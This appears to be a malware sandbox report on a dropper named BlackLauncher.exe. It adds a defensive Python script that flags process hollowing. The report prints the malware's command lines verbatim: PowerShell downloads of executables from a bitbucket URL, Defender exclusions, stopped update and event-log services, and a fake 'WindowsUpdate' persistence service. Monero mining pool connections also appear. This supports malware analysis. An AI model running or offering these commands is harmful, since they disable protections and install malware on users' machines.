PID 240 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 240 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4548 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
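The following is an added Python example, not part of the sandbox report, that correlates the SetThreadContext and WriteProcessMemory tables above. A parent writing into a child it has just created is part of CreateProcess itself, so "wrote to memory of" on its own largely mirrors the process tree; the rows that matter are the source/target pairs that also appear under SetThreadContext, which is the process-hollowing pattern and is what singles out MSBuild.exe, conhost.exe and svchost.exe here. The rows embedded below are copied from the two tables (the repeated WriteProcessMemory entries reduced to a sample); the rule "source outside C:\Windows, target inside it" is the example's own heuristic, not something the report states.

```python
"""Added example: correlate WriteProcessMemory and SetThreadContext into hollowing candidates."""
import re

# Rows copied from the two tables above (repeated WriteProcessMemory rows reduced to a sample).
EVENTS = r"""
PID 4304 set thread context of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4724 set thread context of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 set thread context of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4396 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 4548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe
PID 4548 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\pROUy3v.exe
PID 4548 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\vdVaFs5.exe
PID 1760 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4548 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"""

_ROW = re.compile(r"PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (\S+) (\S+)")
_API = {"wrote to memory of": "WriteProcessMemory", "set thread context of": "SetThreadContext"}


def correlate(text):
    """Collapse rows into one edge per (source pid, target pid) with the set of APIs seen."""
    edges = {}
    for m in _ROW.finditer(text):
        src, op, dst, src_img, dst_img = m.groups()
        edge = edges.setdefault((int(src), int(dst)),
                                {"src": src_img, "dst": dst_img, "apis": set(), "writes": 0})
        edge["apis"].add(_API[op])
        if op == "wrote to memory of":
            edge["writes"] += 1
    return edges


def is_windows_binary(path):
    """Heuristic used by this example: anything under C:\\Windows counts as a system image."""
    return path.lower().startswith("c:\\windows\\")


def hollowing_candidates(edges):
    """Edges where a non-system source both wrote into and re-pointed a thread of a system image."""
    hits = []
    for (src, dst), e in sorted(edges.items()):
        if ({"WriteProcessMemory", "SetThreadContext"} <= e["apis"]
                and is_windows_binary(e["dst"]) and not is_windows_binary(e["src"])):
            hits.append((src, dst, e["dst"].rsplit("\\", 1)[-1]))
    return hits


def plain_parent_writes(edges):
    """Edges with WriteProcessMemory only: consistent with ordinary process creation."""
    return sorted(k for k, e in edges.items() if e["apis"] == {"WriteProcessMemory"})


if __name__ == "__main__":
    graph = correlate(EVENTS)
    for src, dst, image in hollowing_candidates(graph):
        print(f"hollowing candidate: {src} -> {dst} ({image})")
    print("write-only edges:", plain_parent_writes(graph))
```

Run as-is, it reports the three hollowing candidates and lists the remaining edges, which are exactly the parent-to-child launches in the Processes section (BlackLauncher.exe to PowerShell, PowerShell relaunching BlackLauncher.exe elevated, BlackLauncher.exe starting the two dropped binaries, cmd.exe starting wusa.exe).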

Processes

C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command " Start-Process -FilePath 'C:/Users/Admin/AppData/Local/Temp/BlackLauncher.exe' -ArgumentList '--rendering-driver opengl3 --admin-requested' -Verb RunAs "

C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe" --rendering-driver opengl3 --admin-requested

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/pROUy3v.exe'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/pROUy3v.exe'"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/vdVaFs5.exe'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/vdVaFs5.exe'"

C:\ProgramData\Update\pROUy3v.exe

C:\ProgramData\Update\pROUy3v.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\ProgramData\Update\vdVaFs5.exe

C:\ProgramData\Update\vdVaFs5.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "WindowsUpdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "WindowsUpdate"

C:\ProgramData\Windows11\Updater.exe

C:\ProgramData\Windows11\Updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "

Network

Country Destination Domain Proto
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 52.217.135.65:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 65.135.217.52.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.28.77:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 77.28.5.3.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
CH 185.196.9.26:6302 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.15.193.130:10343 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 26.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 130.193.15.51.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
PL 51.68.137.186:10343 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 186.137.68.51.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cpbmhpzc.tdf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\logs\godot.log

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\SceneShaderGLES3\b8b300d8960ddf9f2e23f580909c77c774494a19eea0be58441e7393b5b6593c\fa7b62523470356194bdf709eb2639ab149a07cc.cache

MD5 a272a406be702b21b0b1a3382b88444a
SHA1 bb2d40557e9e4d3db8f468b9d55c9abe5bbe33f3
SHA256 ee6193d85ae6e99d26669f1bdf5fdce7c2f38f38350341dc03783799941a9de6
SHA512 64d62f434880eb4668ac01df9576ca6c2b7fa7a7e3b7ca8f92b4965ad5b1f1f3c0a129dc0dd5495b19f36e59c2b721443716279154b17d0a8a77e4177d94b1f4

C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CopyShaderGLES3\600540f4401230daf6f94143fce3c800b0bc15f0f3dcbb1d423709df581135ef\fa7b62523470356194bdf709eb2639ab149a07cc.cache

MD5 6fe39f9e93796b6d34b5fbf30caa4d75
SHA1 80ea777c8646f2edccad68e2f1f00c05ac084d51
SHA256 8075b36b512f632fdc1cb2028c4c9a21d4f1baf9ff2f64dc4d3857f9edb1b0b4
SHA512 992385567a2c8d679f03adaaa3025e9d37e21021e4684c7e5e0aa1f634150a89d6b054fa06914f8c534c2a91304358ef2018057c377477f9886065a19f41b150

C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CanvasShaderGLES3\93783db0c338a2f64067c117bfba92aa04dd299bfe1fae15f2c90234aba6f117\fa7b62523470356194bdf709eb2639ab149a07cc.cache

MD5 a59a08a5a323b2188bb9c7ae3d55513b
SHA1 b744cc17c893963b3a167a8594ac841b5008b96c
SHA256 1333f9d02221fe0423a43bcfe841ad8d63cc5212dc40a2589c63c108a019e4d9
SHA512 a1f089a437a7307e3287a2a58d8649708e6b8e8777ade8188202b51aebde981c74d1b95b3ab5cd1b613416a62236d08d5e80785159240c009fab32f9d734ffad

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5d574dc518025fad52b7886c1bff0e13
SHA1 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA512 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 25cc7fa9acdb035f977e2b8dd376530d
SHA1 66440c4ef643007c5b9aa99e8420b6e750c8de8f
SHA256 eda1f76078f29ba768a8d27e70678ba7f16f346d232f95d1e8788df1ea1bb666
SHA512 f1b9cb79707a926089a97396db9ed2940875e6c2d97638208171e5114c7893e3ae26004cc6f45c9236f469d55dbc2077178df68704e445e624e06ea04ce89cfc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 910ec3e745c8acc38fab61b097f35b77
SHA1 24ad6c3e786c32d0f819588cad86cd24a5fa9a6a
SHA256 4763872528910615d1b4d6726ac5a8c042fb8f2378ddf249a3ac267958f227f9
SHA512 a5d90ece095a405884e148a6d46ef9f1d96d95dc37ed7c215b4d9432534a86d4262081a412117105f6b0bf5eee6a504de1275e8661bfa718c5ef2ba6413387e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ce426674fa9f8557fc70959699b837fa
SHA1 13379f99e1d7e25537c4c85d3ef042d31baede92
SHA256 c7754795670afb3d3ece891195b184629b513a078fd5c78763d82693c6da3c8e
SHA512 6cd49aeb172324b9ef770958691c0b908a01e23bd03c3f75043b944e13e19294c830a16a33bb2e58bccc7ed1dc85fabc03847e2a843d42f3e925cafbd5275ee9

C:\ProgramData\Update\vdVaFs5.exe

MD5 ad2867dc002af2cca594f0b8202a1843
SHA1 73b3ea99db621b71e7a4a13720c53ebe3a815521
SHA256 2c0e4b4e5535c97fbf45309cbe7ff05006f06db1f3bf31983c7b0e7a7753900d
SHA512 cfb6c5f1333187e0e807a3b2beb72cb50805fac403b900242afce017ccde5a677d7b8c6be86fb9933db64103cb78b17c57fdec4c764f14c89793a5ec3e309108

C:\ProgramData\Update\pROUy3v.exe

MD5 61d3abff46a6bd2946925542c7d30397
SHA1 1fed80a136e67a5b7b6846010a5853400886ee9c
SHA256 b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa
SHA512 e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 174ca7d96de1ececd15503f679acafb5
SHA1 2290e1be0fff941e769cdda7c4907418e983c547
SHA256 d89963e1b500b9e9d62cdaf1f835496e6999c778d8e93578be90342e5560f171
SHA512 896f54a8931a53f518f08255da0ff9ebcf36b3ceb14585bf3183fed281ea8aa883516a90f9b3403043fc071d66ea41d0b726055c36753b8b48996654a112fb2e

\Users\Admin\AppData\Roaming\d3d9.dll

MD5 106fe1980dbcb4fa2fe0c00b6d6fa7c2
SHA1 5cb7eb7be8f3d1641cb458024d868363658a2955
SHA256 c0716389100b55b09f46fafef37bb7d120453df3bfb1097dcd30e14bb97c09bc
SHA512 c9d48c5f5ecf83012f1cc16581b7bb283265a3808847af46195987c7b0721116fe7241185d67b5d7636080881da5f18df04e57e309ff5a133046dd87ca8d06ce

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ff85f09f39c29eed17ea8954d5512aae
SHA1 10dee2e70802b552f752251e75bb678b91f0c172
SHA256 47d3cba5e92ca1194a130906ab17b82e9a70670f4820be8a04cd619065a0edc6
SHA512 bdc3ec9f6cfe78112b2ef516955b8973a445fffc84215a5d0b883c98af5a5237b6fd31ad7f75bd783d2e413414e6b7be505aec0e3a4d38e2b8c0a6f1a526b3fe
